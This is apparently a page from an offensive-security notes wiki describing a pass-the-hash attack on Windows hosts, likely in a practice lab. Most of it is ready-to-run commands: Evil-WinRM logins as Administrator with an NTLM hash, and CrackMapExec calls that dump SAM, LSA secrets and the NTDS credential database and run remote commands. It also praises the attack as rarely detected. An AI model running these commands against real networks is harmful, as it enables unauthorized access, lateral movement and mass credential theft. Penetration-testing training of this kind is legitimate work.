Pass The Hash with Evil-Winrm

Install Evil-Winrm

sudo apt install gem -y
sudo gem install evil-winrm -y

If WINRM is enabled on the endpoint, the awesome tool Evil-WinRm supports using hashes. This is a very silent attack and is not often caught by any security solutions.

WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.

evil-winrm -u Administrator -H 'dbd13e1c4e338284ac4e9874f7de6ef4' -i 192.168.56.11
hostname
ipconfig
whoami
menu
services

evil-winrm -u Administrator -H 'dbd13e1c4e338284ac4e9874f7de6ef4' -i 192.168.56.22
hostname
ipconfig
whoami
menu
services

crackmapexec smb 192.168.56.11 -d NORTH -u administrator -H dbd13e1c4e338284ac4e9874f7de6ef4 --sam
crackmapexec smb 192.168.56.11 -d NORTH -u administrator -H dbd13e1c4e338284ac4e9874f7de6ef4 --lsa
crackmapexec smb 192.168.56.11 -d NORTH -u administrator -H dbd13e1c4e338284ac4e9874f7de6ef4 --ntds


crackmapexec smb 192.168.56.11 -d north -u administrator -H dbd13e1c4e338284ac4e9874f7de6ef4 -x whoami

PreviousPass The Hash with Winpexec.py NextPass the Hash with CrackMapExec

Last updated 2 years ago